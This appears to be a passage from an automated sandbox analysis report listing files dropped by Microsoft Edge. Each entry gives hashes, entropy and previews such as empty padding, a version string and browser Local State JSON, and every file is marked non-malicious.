                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlUj:Ls3U
                                                                                                                                                                                                                                                                                  MD5:D7E33D0FA5ECAF9EF1FF4FA0BDA637B0
                                                                                                                                                                                                                                                                                  SHA1:6AD7E1E7CA5CA51603C9136D887C708C1CCB6A0A
                                                                                                                                                                                                                                                                                  SHA-256:60333E0599327E61D4F1134ABAE26FD788F245308D6801B60EFA1E933057F431
                                                                                                                                                                                                                                                                                  SHA-512:2A371D8EC4ACD9A5F30A64B5161A3878ED1A5CF8E4139D552EF5DE84BB0765968CC000F0D636ACF9E1D48DE92A57B8506EB14CC830ECBE464A019256D045B880
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................<{.#k./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNl/:Ls3/
                                                                                                                                                                                                                                                                                  MD5:30FB8D8273BA9E56B2D9885EC6E43F33
                                                                                                                                                                                                                                                                                  SHA1:C890BC595005ED175E44EC4A3F7191925BC28813
                                                                                                                                                                                                                                                                                  SHA-256:80CD19B6A004E4BE1AC68D9F51CB0C8A7A735D4C5AFDE72CC7BBC52BE8504EB7
                                                                                                                                                                                                                                                                                  SHA-512:CD8007C6878DA17261435D59B9070E75EBB8ED7C20368FC0A173AC811389A216681B3AE4F889251088E41F561806C3BD8F0720E8B5A4B2651B43A774F96A8A27
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...........................................#k./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
